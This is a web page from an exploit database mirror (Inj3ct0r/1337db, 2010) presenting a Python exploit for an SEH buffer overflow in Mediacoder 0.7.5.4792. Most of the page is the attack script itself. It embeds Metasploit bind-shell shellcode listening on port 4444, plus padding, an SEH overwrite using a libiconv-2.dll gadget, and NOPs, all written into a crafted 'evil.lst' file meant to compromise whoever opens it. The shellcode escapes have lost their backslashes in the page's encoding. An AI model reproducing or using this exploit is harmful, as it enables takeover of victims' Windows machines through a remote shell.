Home / os / win7

[local exploits] - Mediacoder 0.7.5.4792 Buffer Overflow Exp

Posted on 29 November 2010

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Mediacoder 0.7.5.4792 Buffer Overflow Exploit (SEH) | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Mediacoder 0.7.5.4792 Buffer Overflow Exploit (SEH) by 0v3r in local exploits | Inj3ct0r 1337 - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var _gaq = _gaq || [];_gaq.push(["_setAccount", "UA-12725838-1"]);_gaq.push(["_setDomainName", "none"]);_gaq.push(["_setAllowLinker", true]);_gaq.push(["_trackPageview"]);(function(){var ga = document.createElement("script"); ga.type = "text/javascript"; ga.async = true;ga.src = ("https:" == document.location.protocol ? "https://ssl" : "http://www") + ".google-analytics.com/ga.js";var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ga, s);})();</script></head><body><pre>===================================================
Mediacoder 0.7.5.4792 Buffer Overflow Exploit (SEH)
===================================================

# Exploit Title: Mediacoder 0.7.5.4792 SEH Buffer Overflow Exploit
# Date: 11/29/2010
# Author: 0v3r
# Software Link: http://www.mediacoderhq.com/mirrors.htm?file=MediaCoder-0.7.5.4792.exe
# Version: 0.7.5.4792
# Tested on: Windows XP SP3 EN
# CVE: N/A
 
#!/usr/bin/python
 
# win32_bind -  EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com
shellcode = (&quot;xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49&quot;
&quot;x49x49x49x37x49x49x49x49x49x49x49x49x51x5ax6ax43&quot;
&quot;x58x30x41x31x50x41x42x6bx41x41x53x32x41x42x41x32&quot;
&quot;x42x41x30x42x41x58x50x38x41x42x75x4ax49x79x6cx62&quot;
&quot;x4ax48x6bx70x4dx38x68x6cx39x4bx4fx79x6fx6bx4fx73&quot;
&quot;x50x4cx4bx72x4cx46x44x57x54x4ex6bx31x55x67x4cx4e&quot;
&quot;x6bx63x4cx34x45x62x58x46x61x48x6fx4ex6bx50x4fx44&quot;
&quot;x58x6cx4bx51x4fx45x70x44x41x6ax4bx70x49x6ex6bx35&quot;
&quot;x64x4cx4bx53x31x78x6ex75x61x6bx70x4fx69x6ex4cx4b&quot;
&quot;x34x4fx30x53x44x57x77x6fx31x4bx7ax74x4dx75x51x69&quot;
&quot;x52x68x6bx48x74x57x4bx70x54x64x64x47x58x50x75x6d&quot;
&quot;x35x4cx4bx31x4fx36x44x56x61x78x6bx63x56x6cx4bx54&quot;
&quot;x4cx70x4bx4ex6bx53x6fx75x4cx47x71x5ax4bx63x33x54&quot;
&quot;x6cx4ex6bx6bx39x30x6cx44x64x35x4cx71x71x5ax63x34&quot;
&quot;x71x6bx6bx72x44x6cx4bx37x33x76x50x4ex6bx71x50x56&quot;
&quot;x6cx6cx4bx44x30x65x4cx4cx6dx4cx4bx77x30x35x58x61&quot;
&quot;x4ex62x48x6cx4ex62x6ex44x4ex38x6cx50x50x4bx4fx5a&quot;
&quot;x76x45x36x70x53x41x76x32x48x70x33x56x52x45x38x42&quot;
&quot;x57x72x53x34x72x63x6fx72x74x6bx4fx78x50x72x48x38&quot;
&quot;x4bx58x6dx6bx4cx65x6bx42x70x49x6fx69x46x71x4fx6c&quot;
&quot;x49x6ax45x65x36x4fx71x4ax4dx35x58x53x32x50x55x32&quot;
&quot;x4ax35x52x49x6fx48x50x31x78x7ax79x36x69x4cx35x6c&quot;
&quot;x6dx70x57x39x6fx6ex36x70x53x32x73x62x73x56x33x52&quot;
&quot;x73x73x73x52x73x33x73x30x53x6bx4fx4ax70x35x36x75&quot;
&quot;x38x52x31x41x4cx61x76x50x53x4dx59x4dx31x4dx45x55&quot;
&quot;x38x69x34x56x7ax42x50x5ax67x36x37x79x6fx7ax76x61&quot;
&quot;x7ax76x70x66x31x73x65x39x6fx68x50x41x78x4dx74x4e&quot;
&quot;x4dx76x4ex68x69x42x77x79x6fx59x46x36x33x66x35x69&quot;
&quot;x6fx6ex30x45x38x4bx55x51x59x6fx76x72x69x42x77x6b&quot;
&quot;x4fx4ax76x70x50x46x34x36x34x53x65x79x6fx6ex30x6c&quot;
&quot;x53x65x38x4bx57x70x79x5ax66x52x59x30x57x69x6fx6a&quot;
&quot;x76x30x55x59x6fx6ex30x70x66x70x6ax53x54x72x46x62&quot;
&quot;x48x65x33x50x6dx6cx49x4dx35x31x7ax52x70x70x59x44&quot;
&quot;x69x7ax6cx4cx49x69x77x51x7ax71x54x4fx79x4bx52x34&quot;
&quot;x71x39x50x4cx33x4dx7ax6bx4ex71x52x44x6dx6bx4ex37&quot;
&quot;x32x54x6cx4ex73x4ex6dx33x4ax56x58x6cx6bx6cx6bx6e&quot;
&quot;x4bx53x58x64x32x69x6ex6cx73x44x56x6bx4fx73x45x47&quot;
&quot;x34x4bx4fx79x46x33x6bx42x77x73x62x30x51x73x61x72&quot;
&quot;x71x62x4ax33x31x42x71x50x51x72x75x50x51x49x6fx78&quot;
&quot;x50x71x78x4ex4dx39x49x75x55x6ax6ex70x53x4bx4fx59&quot;
&quot;x46x32x4ax4bx4fx49x6fx56x57x69x6fx5ax70x4ex6bx33&quot;
&quot;x67x49x6cx6dx53x39x54x55x34x39x6fx4bx66x31x42x69&quot;
&quot;x6fx4ax70x62x48x78x70x4dx5ax35x54x63x6fx70x53x39&quot;
&quot;x6fx4ex36x39x6fx38x50x43&quot;)
 
 
junk = &quot;x41&quot; * 764
nseh = &quot;xebx06x90x90&quot;  # short jump 
seh  = &quot;xeex04x01x66&quot;  # POP POP RET libiconv-2.dll
nops = 16 * &quot;x90&quot;
more = &quot;x42&quot; * (10000 - len(junk + nseh + seh + nops + shellcode))
 
buff = junk + nseh + seh + nops + shellcode  + more
 
print &quot;
&quot; 
print &quot;---------------------------------------------------------------------------------&quot;
print &quot;|             Mediacoder 0.7.5.4792 SEH Buffer Overflow Exploit                 |&quot;
print &quot;---------------------------------------------------------------------------------&quot;
print &quot;
&quot;
 
try:
    f = open(&quot;evil.lst&quot;,&#039;w&#039;)
    f.write(buff)
    f.close()
    print &quot; Vulnerable file created!...
&quot;
except:
    print &quot;[-] Error occured!&quot;


# <a href='http://1337db.com/'>1337db.com</a> [2010-11-29]</pre></body></html>

 

TOP